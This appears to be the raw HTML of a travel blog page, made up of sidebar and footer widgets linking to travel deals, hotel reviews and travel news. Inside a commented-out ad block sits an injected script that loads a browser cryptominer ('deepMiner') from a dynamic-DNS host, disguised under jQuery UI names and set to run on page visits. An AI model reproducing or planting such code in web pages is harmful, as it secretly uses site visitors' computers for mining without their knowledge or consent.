				<div class="gk-nsp-content-wrap"><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/8-mistakes-that-will-ruin-your-weekend-getaway/">8 Mistakes That Will RUIN Your Weekend Getaway!</a></h3>
				</div>
				
				</div>
									<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 20px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/cruises-of-a-lifetime-you-can-actually-afford/" class="gk-image-link"  style="margin: 0 10px 0 0;"><img src="/wp-content/uploads/2014/05/norwegian-getaway-372014-163759_panoramic.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap"><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/cruises-of-a-lifetime-you-can-actually-afford/">Cruises of a Lifetime You Can Actually Afford!</a></h3>
				</div>
				
				</div>
									<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 20px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/easyjet-changes-their-hold-bag-rules/" class="gk-image-link"  style="margin: 0 10px 0 0;"><img src="/wp-content/uploads/2017/11/easyjet_two_planes-768x512.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap"><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/easyjet-changes-their-hold-bag-rules/">Easyjet changes their hold bag rules</a></h3>
				</div>
				
				</div>
									<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 20px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/all-time-worst-travel-scenarios-and-how-to-get-out-of-them/" class="gk-image-link"  style="margin: 0 10px 0 0;"><img src="/wp-content/uploads/2014/05/20placestimessquaredaytime-722012-181558_panoramic.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap"><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/all-time-worst-travel-scenarios-and-how-to-get-out-of-them/">All-Time Worst Travel Scenarios (And How to Get Out of Them!)</a></h3>
				</div>
				
				</div>
								 
			
			
			
			</div>
			</div>
			</div>
			</div>
			
			
			</div>
			
			<!--<img src="/ads/6604_banner_300x250_5.gif" />-->

<!--<script type="text/javascript">
  ( function() {
    if (window.CHITIKA === undefined) { window.CHITIKA = { 'units' : [] }; };
echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
	    if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
	    }
        </script>";
    var unit = {"calltype":"async[2]","publisher":"hosetweb","width":300,"height":250,"sid":"Chitika Default"};
    var placement_id = window.CHITIKA.units.length;
    window.CHITIKA.units.push(unit);
    document.write('<div id="chitikaAdBlock-' + placement_id + '"></div>');
}());
</script>
<script type="text/javascript" src="//cdn.chitika.net/getads.js" async></script> -->

 
		 <div id="widget_gk_nsp-8" class="box  badge-popular all widget_gk_nsp"><h3 class="box-title">Most Popular</h3><div class="gk-nsp mobile_layout" data-cols="1" data-rows="1" data-links="4" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on"><div class="gk-nsp-arts">
		 
		 <div class="gk-nsp-arts-scroll gk-nsp-pages-1"><div class="gk-nsp-arts-page gk-nsp-cols-1"><div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 20px 0 0 0;"><a href="/archives/197" class="gk-responsive gk-image-link"  style="margin: 0 0 20px 0;"><img src="/wp-content/uploads/2014/05/PH2009081701588.jpg" alt="" class="gk-nsp-image gk-responsive" /></a>
		 
		 <h3 class="gk-nsp-header"><a href="/archives/197">L'Hotel Sous les Figuiers</a></h3
		 ></div>
		 </div>
		 </div>
		 </div>
		 <div class="gk-nsp-links">
		 <div class="gk-nsp-links-scroll gk-nsp-pages-1"><ul class="gk-nsp-list gk-nsp-cols-1">
						
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/ireland-air-car-7-nights-from-1102/">Ireland, Air, Car, 7 Nights, From $1,102</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/thailand-travel-10-essential-chiang-mai-experiences/">Thailand travel: 10 essential Chiang Mai experiences</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/8-mistakes-that-will-ruin-your-weekend-getaway/">8 Mistakes That Will RUIN Your Weekend Getaway!</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/europes-coolest-cycling-tour-2/">Europe&#8217;s Coolest Cycling Tour</a></h4></li></ul></div></div></div></div>
		  
		  
		  
		  
		  <div id="widget_gk_nsp-9" class="box  badge-gallery gallery all widget_gk_nsp"><h3 class="box-title">News Gallery</h3><div class="gk-nsp horizontal" data-cols="3" data-rows="4" data-links="" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on"><div class="gk-nsp-arts"><div class="gk-nsp-arts-scroll gk-nsp-pages-1"><div class="gk-nsp-arts-page gk-nsp-cols-1"> 
		  
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/japans-anti-loneliness-cafe-goes-viral/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/140514111518-moomin-cafe-04-horizontal-gallery.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/le-cadran-solaire/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/PH2009081701414.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/10-beautiful-beach-town-bargains-for-fall/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/couples-destinations-sunset-in-hilton-head-sc-7232012-161826_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/levant-hotel/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/PH2010040202459.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/ireland-air-car-6-nights-from-810/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/gardenrsslakekillarneynationalpark-5152012-13284_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/basement-breakout-budapests-escape-games-go-global/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/140515092715-escape-game-budapest-10-horizontal-gallery.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/tuscany-castle-hotel-car-7-nights-from-484/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/montegufoni-castle-in-tuscany-italy-492014-19537_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/etihad-airways-unveils-worlds-most-luxurious-passenger-jets/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/140505093847-1-ethiad-the-residence-horizontal-gallery.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/willis-tower-cracks-frighten-tourists-but-officials-say-no-one-was-in-danger/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/130902140919-platforms-the-ledge-vertical-gallery.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/9-great-tips-for-budget-conscious-travelers/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/family-vacation-3232012-124034_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/lhotel-sous-les-figuiers/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/PH2009081701588.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  <div class="gk-nsp-art gk-nsp-cols-3"  style="padding: 6px 3px 0;"><a href="http://www.gailzavala.com/whales-and-wildlife-the-best-of-alaskas-kenai-peninsula/" class="gk-responsive gk-image-link" ><img src="/wp-content/uploads/2014/05/washington-dcvietnam-memorialflowers31279414-3282014-234540_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a></div>
		  		  
		  </div></div></div></div></div>
		  
		  
		  
		  <div id="widget_gk_nsp-10" class="box   arrows badge-video pattern onlylinks all widget_gk_nsp"><h3 class="box-title">Last Week</h3><div class="gk-nsp" data-cols="" data-rows="" data-links="3" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on"><div class="gk-nsp-arts"><div class="gk-nsp-arts-scroll gk-nsp-pages-"></div></div><div class="gk-nsp-links"><div class="gk-nsp-links-scroll gk-nsp-pages-1"><ul class="gk-nsp-list gk-nsp-cols-1">				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/would-you-pay-to-launch-this-airline/">Would you pay to launch this airline?</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/le-cadran-solaire/">Le Cadran Solaire</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/upgrade-secrets-from-the-experts/">Upgrade Secrets from the Experts!</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/garbis-villas/">Garbis Villas</a></h4></li></ul></div></div></div></div>		</aside>
						<!--[if IE 8]>
		<div class="ie8clear"></div>
		<![endif]-->
	</section><!-- end of the #gk-mainbody-columns -->
</section><!-- end of the .gk-page-wrap section -->	


<section id="gk-bottom2" class="gk-page widget-area">
	<div id="text-2" class="box  widget_text col6 nth1"><h3 class="box-title">Destinations</h3>			<div class="textwidget"><ul>
							
				<li> <a href="http://www.gailzavala.com/100-vampire-proof-hungarys-best-wine-cellars/">100% Vampire-proof: Hungary&#8217;s best wine cellars</a> </li>				
				<li> <a href="http://www.gailzavala.com/basement-breakout-budapests-escape-games-go-global/">Basement breakout: Budapest&#8217;s escape games go global</a> </li>				
				<li> <a href="http://www.gailzavala.com/first-rule-of-chinese-tourism-give-them-what-they-want/">First rule of Chinese tourism: Give them what they want</a> </li>				
				<li> <a href="http://www.gailzavala.com/5-reasons-bathurst-may-be-south-africas-most-eccentric-town/">5 reasons Bathurst may be South Africa&#8217;s most eccentric town</a> </li></ul></div>
		</div><div id="text-3" class="box  widget_text col6 nth2"><h3 class="box-title">Hotels</h3>			<div class="textwidget"><ul>
										
				<li> <a href="http://www.gailzavala.com/deetjens-big-sur-inn/">Deetjen&#8217;s Big Sur Inn</a> </li>				
				<li> <a href="http://www.gailzavala.com/auberge-du-presbytere/">Auberge du Presbytere</a> </li>				
				<li> <a href="http://www.gailzavala.com/the-green-gate/">The Green Gate</a> </li>				
				<li> <a href="http://www.gailzavala.com/paliokaliva-village/">Paliokaliva Village</a> </li></ul></div>
		</div><div id="text-4" class="box  widget_text col6 nth3"><h3 class="box-title">Real deals</h3>			<div class="textwidget"><ul>
							
				<li> <a href="http://www.gailzavala.com/paris-air-6-nights-from-1199/">Paris, Air, 6 Nights, From $1,199</a> </li>				
				<li> <a href="http://www.gailzavala.com/dubai-abu-dhabi-air-6-nights-from-1155/">Dubai &#038; Abu Dhabi, Air, 6 Nights, From $1,155</a> </li>				
				<li> <a href="http://www.gailzavala.com/iceland-air-6-nights-from-788/">Iceland, Air, 6 Nights, From $788</a> </li>				
				<li> <a href="http://www.gailzavala.com/patagonia-tours-8-nights-from-1045/">Patagonia, Tours, 8 Nights, From $1,045</a> </li></ul></div>
		</div><div id="text-5" class="box  widget_text col6 nth4"><h3 class="box-title">Travel News</h3>			<div class="textwidget"><ul>
							
				<li> <a href="http://www.gailzavala.com/seoul-unveils-451-million-spaceship-landmark/">Seoul unveils $451 million &#8216;spaceship&#8217; landmark</a> </li>				
				<li> <a href="http://www.gailzavala.com/sources-airlines-warned-to-beware-of-possible-shoe-bombs/">Sources: Airlines warned to beware of possible shoe bombs</a> </li>				
				<li> <a href="http://www.gailzavala.com/first-cycling-day-trip-to-north-korea-launched-from-china/">First cycling day trip to North Korea launched from China</a> </li>				
				<li> <a href="http://www.gailzavala.com/would-you-pay-to-launch-this-airline/">Would you pay to launch this airline?</a> </li></ul></div>
		</div><div id="text-6" class="box  widget_text col6 nth5"><h3 class="box-title">Travel tips</h3>			<div class="textwidget"><ul>
							
				<li> <a href="http://www.gailzavala.com/8-great-labor-day-weekend-getaways/">8 Great Labor Day Weekend Getaways</a> </li>				
				<li> <a href="http://www.gailzavala.com/all-time-worst-travel-scenarios-and-how-to-get-out-of-them/">All-Time Worst Travel Scenarios (And How to Get Out of Them!)</a> </li>				
				<li> <a href="http://www.gailzavala.com/insiders-guide-to-the-caribbean/">Insiders&#8217; Guide to the Caribbean</a> </li>				
				<li> <a href="http://www.gailzavala.com/cruises-of-a-lifetime-you-can-actually-afford/">Cruises of a Lifetime You Can Actually Afford!</a> </li></ul></div>
		</div><div id="text-7" class="box  widget_text col6 nth6"><h3 class="box-title">Trip ideas</h3>			<div class="textwidget"><ul>
							
				<li> <a href="http://www.gailzavala.com/6-charming-affordable-european-cities-you-havent-visited-yet/">6 Charming &#038; Affordable European Cities You Haven&#8217;t Visited Yet</a> </li>				
				<li> <a href="http://www.gailzavala.com/10-best-budget-vacations-for-summer/">10 Best Budget Vacations for Summer</a> </li>				
				<li> <a href="http://www.gailzavala.com/worst-travel-nightmares-and-how-to-make-them-go-away/">Worst Travel NIGHTMARES! (And How to Make Them Go Away)</a> </li>				
				<li> <a href="http://www.gailzavala.com/upgrade-secrets-from-the-experts/">Upgrade Secrets from the Experts!</a> </li></ul></div>
		</div>	<!--[if IE 8]>
	<div class="ie8clear"></div>
	<![endif]-->
</section>

	<footer id="gk-footer" class="gk-page">			
		<ul id="footer-menu" class="menu gk_normal"><li id="menu-item-803" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-803"><a href="/">Home</a></li>
<li id="menu-item-804" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-804"><a href="/terms-of-service">Terms of Service</a></li>
<li id="menu-item-805" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-805"><a href="/privacy-guidelines">Privacy Guidelines</a></li>
<!--<li id="menu-item-806" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-806"><a href="/contact-us">Contact Us</a></li>-->
 
</ul>		
		<div class="gk-copyrights">
		Copyright © <a href="http://www.gailzavala.com">The Gailzavala Ltd</a> . All rights reserved.</div>
		
		 
			</footer>
	
	
 
<div id="gk-popup-overlay"></div>
	
		 
	<script type='text/javascript' src='/images/shortcodes.typography.js?ver=3.9.1'></script>
<script type='text/javascript' src='/images/shortcodes.elements.js?ver=3.9.1'></script>
<script type='text/javascript' src='/images/shortcodes.template.js?ver=3.9.1'></script>
</body>
</html>